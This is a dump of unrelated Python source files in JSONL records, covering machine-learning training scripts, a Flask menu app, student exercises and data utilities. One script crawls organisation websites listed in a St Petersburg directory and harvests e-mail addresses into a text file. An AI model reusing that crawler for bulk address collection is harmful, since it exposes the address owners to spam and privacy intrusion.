i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+\"Paralog to\"+\" \"+i[8])\n Temp_Scas_Ortholog_List.append(line) \n elif re.search(line, row[28]):\n for i in Scer_Gene_List:\n if re.search(row[21], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(row[11], i[0]) and not re.search(row[21], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+\"Paralog to\"+\" \"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n\nSNPS_Table_out_open.write(\"Genes with S. cerevisiae orthologs (Includes paralogs):\"+\" \"+str(Match)+'\\n')\n\nfor line in Temp_Scas_Ortholog_List:\n for row in Scas_Mut_No_Ortholog_List_2:\n if row == line:\n Scas_Mut_No_Ortholog_List_2.remove(row)\n\nSNPS_Table_out_open.write(\"Genes without S. 
cerevisiae orthologs:\"+\" \"+str(len(Scas_Mut_No_Ortholog_List_2))+'\\n')\nSNPS_Table_out_open.write('\\n'+'\\n')\n\nfor line in Scas_Ortholog_List:\n Scas_Scer_Gene_Annotation_out_open.write(line+\"\\n\")\n\nfor line in Scas_Mut_No_Ortholog_List_2:\n Scas_Scer_No_Ortholog_out_open.write(line+\"\\n\")\n\n \nScas_Scer_Gene_Annotation_out_open.close()\nScas_Scer_No_Ortholog_out_open.close()\nSNPS_Table_out_open.close()\n","sub_path":"SNP_Ncas_Scer_Gene_Comparison_Synteny_Nonsynonymous_Search.py","file_name":"SNP_Ncas_Scer_Gene_Comparison_Synteny_Nonsynonymous_Search.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208125471","text":"def maxCons(mtx,n,m):\n c = []\n ind = 0\n consonant = 'bcdfghjklmnpqrstvwxz' + 'bcdfghjklmnpqrstvwxz'.upper()\n for j in range(m):\n count = 0\n for i in range(n-1):\n if (a[i][j] and a[i+1][j]) in consonant:\n count += 1\n c.append(count)\n if max(c) == count:\n ind = j\n return ind\n\ndef delCol(mtx,n,m):\n ind = maxCons(mtx,n,m)\n for i in range(n):\n del mtx[i][ind]\n\n for i in range(n):\n for j in range(m-1):\n print(mtx[i][j],end=' ')\n print()\n\nfrom random import randint\na = []\nN = 5\nM = 10\nsymbols = [chr(i) for i in range(91,97)]\nfor i in range(N):\n b = []\n for j in range(M):\n #b.append(input())\n b.append(chr(randint(65,122)))\n for k in range(len(b)):\n if b[k] in symbols:\n b[k] = chr(randint(97,122))\n print(b[j],end=' ')\n print('|',i+1,end='')\n a.append(b)\n print()\n\nfor i in range(M):\n print('-',end=' ')\nprint()\n\nfor i in range(M):\n print(i+1,end=' ')\n\nprint(\"\"\"\n\n\"\"\"\n'The index of column is:',maxCons(a,N,M)+1,\"\"\"\n\"\"\")\n\ndelCol(a,N,M)\n","sub_path":"allProgramms/helpforpyt/ekzamenTrue.py","file_name":"ekzamenTrue.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461104153","text":"import os\n\n#this is taken from https://github.com/xianyi/OpenBLAS\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['GOTO_NUM_THREADS'] = '1'\nos.environ['OMP_NUM_THREADS'] = '1'\n\nfrom simulations import MemorizableSimulation\nfrom learners import ResidualLearner, MemorizedLearner, MemCorralLearner, MemorizedVW, CMT_Implemented\nfrom scorers import ClassScorer, ClassScorer2, AdditionScorer, DistanceScorer, RegrScorer, UCBScorer, Baser\nfrom feedbacks import DevFeedback, RwdFeedback\nfrom examplers import PureExampler, DiffExampler\n\nfrom coba.simulations import ValidationSimulation, OpenmlSimulation\nfrom coba.benchmarks import Benchmark\nfrom coba.learners import VowpalLearner, CorralLearner\n\nmax_memories = 3000\nepsilon = 0.1\nd = 4\nc = 40\nmegalr = 0.1\n\nprocesses = 1\nshuffle = [1]\ntake = 10000\n\nsimulations = [\n #ValidationSimulation (30000, n_actions=5, action_features=False, make_binary=True),\n #ValidationSimulation (30000, n_actions=5, action_features=True , make_binary=True),\n #MemorizableSimulation(30000, n_anchors=200, n_actions=2, n_features=5)\n OpenmlSimulation(40985, nominal_as_str=True)\n]\n\n#BEST\nscorer1 = RegrScorer (exampler=PureExampler())\nscorer2 = ClassScorer (exampler=PureExampler())\nscorer3 = RegrScorer (exampler=DiffExampler())\nscorer4 = ClassScorer (exampler=DiffExampler())\nscorer5 = ClassScorer2()\n\n#SECOND BEST\n#scorer1 = RegrScorer (base=\"l2\" , exampler=PureExampler(), interactions=[\"ac\",\"ad\",\"bc\",\"bd\",\"abcd\"], ignored=[\"a\",\"b\",\"c\",\"d\"])\n#scorer2 = 
ClassScorer(base=\"l2\" , exampler=PureExampler(), interactions=[\"ac\",\"ad\",\"bc\",\"bd\",\"abcd\"], ignored=[\"a\",\"b\",\"c\",\"d\"])\n#scorer3 = RegrScorer (base=\"cos\", exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer4 = ClassScorer(base=\"l2\" , exampler=DiffSquareExampler(), interactions=[], ignored=[])\n\n#[x1,x2,x3] [y1,y2,y3]\n#[(x1-y1)**2, (x2-y2)**2, (x3-y3)**2] = ||x-y||^2\n\n#TEST BED\n#scorer1 = RegrScorer(base=\"none\",exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer2 = RegrScorer(base=\"mem\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer3 = RegrScorer(base=\"l2\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer4 = ClassScorer(base=\"cos\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n\n#950-1000 @2000\n#750 @2000\n\ncmt_1 = CMT_Implemented(max_memories, router_type='sk', alpha=0.25, scorer=scorer4, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\ncmt_2 = CMT_Implemented(max_memories, router_type='sk', alpha=0.25, scorer=scorer5, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\ncmt_3 = CMT_Implemented(max_memories, router_type='vw', alpha=0.25, scorer=scorer4, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\n#cmt_3 = CMT_Implemented(max_memories, router_type='vw', scorer=scorer3, signal=RwdFeedback(), c=c, d=d, megalr=megalr)\n#cmt_4 = CMT_Implemented(max_memories, router_type='vw', scorer=scorer4, signal=RwdFeedback(), c=c, d=d, megalr=megalr)\n\nlearners = [\n MemorizedLearner(epsilon, cmt_1),\n #MemorizedLearner(epsilon, cmt_2),\n #MemorizedLearner(epsilon, cmt_3),\n #MemorizedLearner(epsilon, cmt_3),\n #MemorizedLearner(epsilon, cmt_4),\n]\n\nif __name__ == '__main__':\n Benchmark(simulations, take=take, shuffle=shuffle).processes(processes).chunk_by('task').evaluate(learners).plot_learners()","sub_path":"study1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516241693","text":"from lib.support.custom_wait import CustomWait\nfrom lib.support.expected import *\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import MoveTargetOutOfBoundsException\n\n\nclass WebAction(CustomWait):\n\n def __init__(self, driver, model, timeout=30):\n super().__init__(timeout)\n self._driver = driver\n self._model = model\n\n def wait_until_text_display(self, text):\n return self.until(TextDisplayOnPage(text), f\"cannot see --{text}-- on page\")\n\n def wait_until_element_display(self, element, keyword=None):\n message = f\"cannot see --{element}-- on page\"\n if keyword:\n message += f\" with keyword --{keyword}--\"\n return self.until(ElementDisplayOnPage(self._model, element, keyword), message)\n\n def wait_until_element_match(self, element, keyword):\n message = f\"cannot see --{element}-- on page with keyword --{keyword}--\"\n return self.until(ElementMatchOnPage(self._model, element, keyword), message)\n\n def check_offset(self):\n v_size = BaseExpectation.get_viewport_size(self._driver)\n b_size = BaseExpectation.get_body_size(self._driver)\n body = self._driver.find_element_by_tag_name(\"body\")\n x = 0\n y = 0\n if v_size[1] != b_size[1]:\n while True:\n try:\n ActionChains(self._driver).move_to_element_with_offset(body, x, y).click().perform()\n ActionChains(self._driver).reset_actions()\n break\n except MoveTargetOutOfBoundsException:\n y += 10\n return [x, y], 
body\n","sub_path":"lib/action/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558538505","text":"import os\r\nimport sys\r\nimport time\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\r\nfrom argparse import ArgumentParser\r\nfrom keras.callbacks import TensorBoard\r\nfrom keras import backend as K\r\nfrom keras.models import load_model\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\nfrom model import *\r\nfrom h5_to_pb import *\r\n\r\n# control CUDA/tensorflow log level\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # or any {'0', '1', '2'}\r\n\r\n\r\ndef build_argparser():\r\n parser = ArgumentParser()\r\n parser.add_argument('-m', help='model name:lenet,squeezenet,mobilenet,resnet50',\r\n required=True, type=str, choices=['lenet', 'squeezenet', 'mobilenet', 'resnet50', 'xception'])\r\n parser.add_argument('-b', help='batch size', type=int, default=16)\r\n parser.add_argument('-e', help='epoch', type=int, default=30)\r\n parser.add_argument('-log', help='directory to save log', type=str,\r\n default='./log_dir')\r\n parser.add_argument('-dst', help='Path to the models to save.', required=True, type=str)\r\n parser.add_argument('-src', help='Path to the folder of the training data', required=True,\r\n type=str)\r\n parser.add_argument('-pm', help='Pre train model',default=\"\")\r\n parser.add_argument('-flip', help='Augmentation:is to flip image on x or y axis', action=\"store_true\")\r\n return parser\r\n\r\ndef main():\r\n # Parameter analysis\r\n args = build_argparser().parse_args()\r\n src_path = os.path.abspath(args.src)\r\n dst_path = os.path.abspath(args.dst)\r\n log_dir = args.log\r\n model_name = args.m\r\n batch_size = args.b\r\n epochs = args.e\r\n flip_flag = args.flip\r\n pre_train_model=args.pm\r\n\r\n\r\n pre_train_model=None if pre_train_model==\"\" else pre_train_model\r\n\r\n # prepare data\r\n num_classes = len(os.listdir(src_path))\r\n\r\n # keras config\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n # keras_config = tf.ConfigProto()\r\n # keras_config.gpu_options.per_process_gpu_memory_fraction = 0.95\r\n # with tf.Session(config=keras_config) as sess:\r\n with tf.Session() as sess:\r\n K.set_session(sess)\r\n # prepare model\r\n if model_name == 'lenet':\r\n image_size = 32\r\n model = lenet(pretrained_weights=None,\r\n input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'squeezenet':\r\n image_size = 227\r\n model = SqueezeNet(weights='imagenet',\r\n input_shape=(image_size, image_size, 3),\r\n classes=num_classes)\r\n elif model_name == 'mobilenet':\r\n image_size = 128\r\n model = mobilenet(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'resnet50':\r\n image_size = 224\r\n model = resnet50(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'xception':\r\n image_size = 299\r\n model = xception(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes,pretrained_weights=pre_train_model)\r\n\r\n data_number = 0\r\n validation_split = 0.2\r\n for folder_name in os.listdir(src_path):\r\n data_number += len(os.listdir(os.path.join(src_path, folder_name)))\r\n print('all data number:', data_number)\r\n\r\n train_steps = int(data_number * (1 - validation_split) // 
batch_size)\r\n validation_step = int(data_number * validation_split // batch_size)\r\n\r\n # generate training data\r\n if flip_flag:\r\n datagen = ImageDataGenerator(horizontal_flip=True,\r\n vertical_flip=True,\r\n rescale=1. / 255,\r\n brightness_range=(0, 1.0),\r\n shear_range=10,\r\n channel_shift_range=50,\r\n validation_split=validation_split)\r\n else:\r\n datagen = ImageDataGenerator(rescale=1. / 255,\r\n brightness_range=(0, 1.0),\r\n shear_range=10,\r\n channel_shift_range=50,\r\n validation_split=validation_split)\r\n\r\n train_generator = datagen.flow_from_directory(src_path,\r\n subset='training',\r\n target_size=(image_size, image_size),\r\n batch_size=batch_size)\r\n # save_to_dir='/home/xuxin/Desktop/test/image')\r\n validation_generator = datagen.flow_from_directory(src_path,\r\n subset='validation',\r\n target_size=(image_size, image_size),\r\n batch_size=batch_size)\r\n\r\n model_path = os.path.join(dst_path, src_path.split(os.sep)[-1])\r\n os.makedirs(model_path, exist_ok=True)\r\n h5_path = os.path.join(model_path, model_name + '.h5')\r\n\r\n # training\r\n callbacks_list = [EarlyStopping(monitor='val_acc', patience=15, verbose=0),\r\n # TensorBoard(log_dir=log_dir),\r\n ModelCheckpoint(h5_path, monitor='val_acc', verbose=0,\r\n save_best_only=True, save_weights_only=False)]\r\n\r\n model.fit_generator(train_generator,\r\n steps_per_epoch=train_steps,\r\n epochs=epochs,\r\n validation_data=validation_generator,\r\n validation_steps=validation_step,\r\n verbose=2,\r\n callbacks=callbacks_list)\r\n\r\n # save model\r\n print('Saving model...')\r\n print('saving %s' % h5_path)\r\n\r\n K.clear_session()\r\n\r\n # convert model to pb format\r\n pb_path = os.path.join(model_path, model_name + '.pb')\r\n print('saving %s' % pb_path)\r\n convert(h5_path, pb_path)\r\n time.sleep(0.5)\r\n\r\n # convert model to openvino IR format\r\n # ir_cmd = \"python /opt/intel/openvino/deployment_tools/model_optimizer/mo_tf.py --input_model %s \" \\\r\n # \"--data_type FP32 --output_dir %s --input_shape [1,%d,%d,3] --silent\" \\\r\n # % (pb_path, model_path, image_size, image_size)\r\n # print(ir_cmd)\r\n # os.system(ir_cmd)\r\n print('Model saved.')\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main() or 0)\r\n","sub_path":"training_backhand/utils/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"511415041","text":"from flask import Flask\napp = Flask(__name__)\n\n# Import modules for CRUD operations from lesson-1\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\n# Create session and connect to DB\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n@app.route('/')\n@app.route('/hello')\ndef HelloWorld():\n restaurant = session.query(Restaurant).filter_by(id = '2')\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant[0].id)\n output = ''\n for item in items:\n output += item.name\n output += '
</br>'\n        output += item.price\n        output += '</br>'\n        output += item.description\n        output += '</br></br>
'\n return output\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/3_restaurant/Lesson-3/3_Listing-Menu-Items-with-Flask/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"3555537","text":"# Librerias\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n\n# Importo el dataset\ndataset = pd.read_csv('./ejercicios/regresion-lineal-polinomica/Position_Salaries.csv')\nx = dataset.iloc[:, 1:-1].values\ny = dataset.iloc[:, -1].values\n\n# Ajustar mi dataset con las nuevas columnas polinomicas\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree=4)\nx_poly = poly_reg.fit_transform(x)\n\n# Crear el modelo de regresion lineal\nfrom sklearn.linear_model import LinearRegression\nregresion = LinearRegression()\nregresion.fit(x_poly, y)\n\n# Predecir el conjunto de testing\ny_predic = regresion.predict(x_poly)\n\n# Graficar los resultados\nplt.scatter(x, y, color=\"red\")\nplt.plot(x, y_predic, color=\"blue\")\nplt.title(\"Sueldo vs Nivel\")\nplt.xlabel(\"Nivel\")\nplt.ylabel(\"Sueldo $\")\nplt.show()\n","sub_path":"ejercicios/regresion-polinomica/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"472964530","text":"# coding: utf8\nimport inspect\nimport os\nimport sys\n\nfrom sklearn.base import BaseEstimator, RegressorMixin\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import KNeighborsRegressor\n\n# Full path\nsys.path.insert(0, '../../sdr_toolbox/')\n\nfrom sdr_toolbox.sdr_estimators.sir import sir\n\n\n\n\n\nclass SIRKnn(BaseEstimator, RegressorMixin):\n \"\"\"\n Implementing SIR for dimension reduction + kNN on reduced features as\n regressor.\n \"\"\"\n\n def __init__(self, n_neighbors = 1, n_components = 1,\n n_levelsets = 1, n_jobs = 1, rescale = True):\n \"\"\"\n\n \"\"\"\n # Set attributes of object to the same name as given in the argument\n # list.\n args, _, _, values = inspect.getargvalues(inspect.currentframe())\n values.pop(\"self\")\n\n for arg, val in values.items():\n setattr(self, arg, val)\n\n\n def fit(self, X, y=None):\n \"\"\"\n \"\"\"\n if self.n_components > self.n_levelsets:\n raise RuntimeError(\"n_components = {0} > {1} = n_levelsets\".format(self.n_components, self.n_levelsets))\n n_samples, n_features = X.shape\n self.SIR_space_ = sir(X.T, y, d = self.n_components,\n n_levelsets = self.n_levelsets,\n rescale = self.rescale)\n self.XT_ = (self.SIR_space_.T.dot(X.T)).T\n self.knn_ = KNeighborsRegressor(n_neighbors = self.n_neighbors,\n n_jobs = self.n_jobs)\n self.knn_ = self.knn_.fit(self.XT_, y)\n return self\n\n\n def predict(self, X, y=None):\n try:\n getattr(self, \"knn_\")\n except AttributeError:\n raise RuntimeError(\"You must train estimator before predicting data!\")\n\n return self.knn_.predict(self.SIR_space_.T.dot(X.T).T)\n","sub_path":"estimators/SIRKnn.py","file_name":"SIRKnn.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47526066","text":"import pytorch_lightning as pl\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.functional as F\nimport util\nfrom argparse import ArgumentParser\n\n\nclass ExampleModel(pl.LightningModule):\n def 
__init__(self, hparams):\n super().__init__()\n self.hparams = hparams\n self.hparams[\"tpu_cores\"] = 0\n self.loss = self.get_loss_fn()\n # you can get fancier here of course, we will likely have a separate\n # class for the model\n self.model = nn.Sequential(\n nn.Linear(40, 128),\n nn.ReLU(),\n nn.Linear(128, 256),\n nn.ReLU(),\n nn.Linear(256, self.hparams.n_classes),\n )\n\n def forward(self, inputs):\n # defines what happens at inference times\n logits = self.model(inputs)\n probs = (\n torch.sigmoid(logits)\n if self.hparams.n_classes == 1\n else nn.Softmax(-1)(logits)\n )\n return probs\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self.model(x)\n loss = self.loss(logits, y)\n self.log(\"train_loss\", loss)\n # see the arguments to self.log\n # https://pytorch-lightning.readthedocs.io/en/stable/new-project.html#logging\n return loss\n\n def training_epoch_end(self, training_step_outputs):\n example = []\n for loss in training_step_outputs:\n example.append(loss.detach().cpu().item())\n training_epoch_loss = sum(example) / len(example)\n self.log(\n \"train_epoch_loss\",\n training_epoch_loss,\n logger=True,\n on_step=True,\n prog_bar=True,\n )\n return training_epoch_loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self.model(x)\n loss = self.loss(logits, y)\n self.log(\"validation_loss\", loss, logger=True)\n # do more things to evaluate intuitive metrics\n\n def validation_epoch_end(self, valid_step_outputs):\n for loss in valid_step_outputs:\n example.append(loss.detach().cpu().item())\n val_loss = sum(example) / len(example)\n self.log(\"val_epoch_loss\", val_loss, logger=True)\n # perhaps log some sort of visualization of a transformation on the data\n # or something, you can do anything you want\n return val_loss\n\n def get_loss_fn(self):\n # you can either get the loss function from args or by hand\n loss = (\n nn.BCEWithLogitsLoss()\n if self.hparams.n_classes == 1\n else nn.CrossEntropyLoss()\n )\n return loss\n\n def configure_optimizers(self):\n if self.hparams.optimizers == \"Adam\":\n optim = torch.optim.Adam(self.model.parameters(), lr=self.hparams.lr)\n else:\n optim = torch.optim.SGD(\n self.model.parameters(),\n lr=self.hparams.lr,\n momentum=self.hparams.momentum,\n )\n\n # test this\n return util.set_schedule(self, optim)\n\n def __dataloader(self, split):\n # write this\n pass\n\n def val_dataloader(self):\n return self.__dataloader(\"valid\")\n\n def train_dataloader(self):\n return self.__dataloader(\"train\")\n\n def test_dataloader(self):\n return self.__dataloader(\"test\")\n\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument(\"--n_classes\", type=int, default=1)\n","sub_path":"lightning/example_lightning.py","file_name":"example_lightning.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8455359","text":"# 2805 / calculate profit of harvested crops in rhombus\nfor T in range(int(input())):\n N = int(input())\n mat = [list(map(int, input())) for i in range(N)]\n\n mid, res = N // 2, 0\n for i in range(N):\n if i < mid: # row which is before mid, extend range\n res += sum(mat[i][mid - i:mid + i + 1])\n else: # row which is after mid, reduce range\n res += sum(mat[i][mid - (N - i - 1):mid + (N - i)])\n\n print(f'#{T + 1} {res}')\n 
","sub_path":"D3/2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403970695","text":"import sys\n\nd_trig = False\nf_trig = False\no_trig = False\n\ni_trig = False\n\nfile_name = ''\npath = ''\noutfile_name = ''\n\ndef consist_list(file):\n f = open(file, \"r\")\n data = f.read()\n f.close()\n\n data = data.split('\\n')[:-1]\n if d_trig:\n print(data)\n return data\n\nif __name__ == \"__main__\":\n for i in sys.argv:\n if i == '-d':\n d_trig = True\n elif i == '-p':\n f_trig = True\n elif f_trig == True:\n file_name = i\n f_trig = False\n elif i == '-o':\n o_trig = True\n elif o_trig == True:\n outfile_name = i\n o_trig = False\n elif i == '-i':\n i_trig = True\n\n if len(file_name) == 0:\n print('Enter the Path list file name behind -p.')\n exit(-1)\n\n contents = consist_list(file_name)\n\n if i_trig == True:\n out_file = open(outfile_name.split('.')[0] + '_ID.txt', \"w\")\n for file in contents:\n f = open(file + '.txt', \"r\")\n for line in f:\n out_file.write(line[:-1] + ' ' + file + '\\n')\n else:\n out_file = open(outfile_name, \"w\")\n for file in contents:\n f = open(file + '.txt', \"r\")\n for line in f:\n out_file.write(line[:-1] + '\\n')\n f.close()\n out_file.close()\n","sub_path":"src/gps/pure_pursuit/paths/detail_map/centerLine/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"401012653","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport threading\neMails = []\nurls = []\nlast_urls =[]\ndef findEmail(url, TTL, mainUrl):\n eMail = ''\n try:\n #Сразу отсеим ссылки на документы pdf\n if url.find(\"pdf\") < 0:\n # Загрузаем страницу сайта\n page = urlopen(url)\n except Exception:\n return eMail\n #Парсим полученную страницу\n soup = BeautifulSoup(page, 'html.parser')\n #Получаем все теги-ссылки\n page_urls = soup.findAll('a')\n \n #Обрабатываем полученные ссылки\n for element in page_urls:\n #Если тег не пустой\n if element.string != None:\n #Если в тексте тега содержится символ Собака\n if element.string.find('@')>=0:\n # Мы нашли e-mail, возвращаем его\n eMail = element.string\n return eMail\n else: \n # Если время жизни паука еще не кончилось\n if TTL > 0:\n try:\n #Проверяем, что ссылка на страницу и еще не была посещена и находится в пределах обыскиваемого сайта\n if element['href'].find(mainUrl) >= 0 and last_urls.count(element['href'])<1:\n #Добавляем ссылку в посещенные\n last_urls.append(element['href'])\n #Пробуем получить e-mail с этой страницы, уменьшив время жизни\n eMail_1 = findEmail(element['href'], TTL-1,mainUrl)\n #Если получили в результате адрес почты\n if eMail_1.find('@')>=0:\n return eMail_1\n except Exception:\n eMail_1 = ''\n \n return eMail\n\n#Фукция-обертка для удобного запуска потока\ndef startFinder(url, TTL, mainUrl):\n #Отчитываемся о том, что запустили поток\n print(\"thread \" + mainUrl + \" start \\n\")\n #Ищем адреса на сайте (mainUrl нужен для того, чтобы оставаться в пределах сайта)\n eM = findEmail(url, TTL,mainUrl)\n #Добавляем в список\n eMails.append(eM)\n\nevents = []\ni = 1\nwhile i<=26: #На сайте 26 страниц с полезной иформацией\n # Загружаем страницу\n page = urlopen(\"https://esir.gov.spb.ru/category/21/?page=\"+str(i)) \n \n #Парсим страницу с помощью BeautifulSoup\n soup = BeautifulSoup(page, 'html.parser')\n \n #Получаем со страницы все теги с 
классом small\n urls_tag = soup.findAll(attrs={\"class\":\"small\"})\n \n #Добавляем адреса сайтов в список и запусткаем обработку полученного полученного сайта в отдельном потоке\n for element in urls_tag:\n urls.append(element.string)\n events.append(threading.Thread(target=startFinder,args=('http://' + element.string, 3,element.string)))\n #Запускаем поток\n events[-1].start() \n i=i+1\ni = 1\nwhile i<=5:\n page = urlopen(\"https://esir.gov.spb.ru/category/22/?page=\"+str(i))\n soup = BeautifulSoup(page, 'html.parser')\n urls_tag = soup.findAll(attrs={\"class\":\"small\"})\n for element in urls_tag:\n urls.append(element.string)\n events.append(threading.Thread(target=startFinder,args=('http://' + element.string, 3,element.string)))\n events[-1].start()\n i=i+1 \n#Завершаем потоки\nfor e in events:\n e.join()\n#Открываем файл на запись (Если файла нет, он создастся автоматически)\nf = open( 'emails.txt', 'w' )\n\n#Записываем по очереди на отдельные строки все элементы полученного списка\nfor item in eMails:\n #Если длинна больше трех (убираем пустые строки с сайтов, где не было найдено e-mail)\n if len(item) > 3:\n print(item)\n f.write(\"%s\\n\" % item)\n#Закрываем файл\nf.close()\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"541249413","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport time\n\n#这里修改准备预处理的文件的名字\nfilename = './10_10_10_65_9000_optimizer_2015-10-19.log'\n\n\n#下面11个是想要获取的城市名称(输出的文件名也是他们)\ncity1 = '中国_安徽_合肥'\ncity2 = '中国_江西_南昌'\ncity3 = '中国_河南_郑州'\ncity4 = '中国_湖南_��沙'\ncity5 = '中国_海南_海口'\ncity6 = '中国_贵州_贵阳'\ncity7 = '中国_陕西_西安'\ncity8 = '中国_青海_西宁'\ncity9 = '中国_内蒙古_呼和浩特'\ncity10 = '中国_西藏_拉萨'\ncity11 = '中国_新疆_乌鲁木齐'\n\n\ndef wrete_content(filename, content):\n\twith open(filename, 'a+', encoding= 'utf-8') as f1:\n\t\tf1.write(content)\n\nstart = time.time()\nwith open(filename, 'r', encoding= 'utf-8') as f:\n\tfor line in f:\n\t\ttry:\n\t\t\tobj = json.loads(line)\t\n\t\t\tcityname = obj['city']\n\t\t\tif(cityname == city1):\n\t\t\t\twrete_content(city1,line)\n\t\t\tif(cityname == city2):\n\t\t\t\twrete_content(city2,line)\n\t\t\tif(cityname == city3):\n\t\t\t\twrete_content(city3,line)\n\t\t\tif(cityname == city4):\n\t\t\t\twrete_content(city4,line)\n\t\t\tif(cityname == city5):\n\t\t\t\twrete_content(city5,line)\n\t\t\tif(cityname == city6):\n\t\t\t\twrete_content(city6,line)\n\t\t\tif(cityname == city7):\n\t\t\t\twrete_content(city7,line)\n\t\t\tif(cityname == city8):\n\t\t\t\twrete_content(city8,line)\n\t\t\tif(cityname == city9):\n\t\t\t\twrete_content(city9,line)\n\t\t\tif(cityname == city10):\n\t\t\t\twrete_content(city10,line)\n\t\t\tif(cityname == city11):\n\t\t\t\twrete_content(city11,line)\t\t\t\n\t\texcept:\n\t\t\tcontinue\nend = time.time()\t\ntotal = end - start\nminutes = total//60\nseconds = total%60\nprint('一共耗时: ' + str(minutes) +' 分 ' + str(seconds) + '秒\\n')\n\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"267574583","text":"import numpy as np\nimport collections \nimport ipdb\n\n\n\nclass pf_distributions:\n\n def __init__(self,sample_particles,log_inc_weight,sample_particles_initial,log_inc_weight_initial):\n # test that the methods passed are callable\n assert callable(sample_particles)\n assert callable(log_inc_weight)\n assert 
callable(sample_particles_initial)\n assert callable(log_inc_weight_initial)\n\n # add methods to object\n self.sample_particles_initial = sample_particles_initial\n self.sample_particles = sample_particles\n self.log_inc_weight_initial = log_inc_weight_initial\n self.log_inc_weight = log_inc_weight\n\n\n\nclass pf_params:\n\n def __init__(self,muparams,fparams,gparams):\n assert isinstance(muparams,dict)\n assert isinstance(fparams,dict)\n assert isinstance(gparams,dict)\n self.muparams = muparams\n self.fparams = fparams\n self.gparams = gparams\n\ndef get_pf_settings(likelihood_only,rel_var_est=False,ess_threshold=np.Inf,occasional_obs=False,propagation_freq=1,systematic_resampling=False):\n pf_settings = {'rel_var_est':rel_var_est,\n 'likelihood_only':likelihood_only,\n 'ess_threshold':ess_threshold,\n 'occasional_obs':occasional_obs,\n 'propagation_freq':propagation_freq,\n 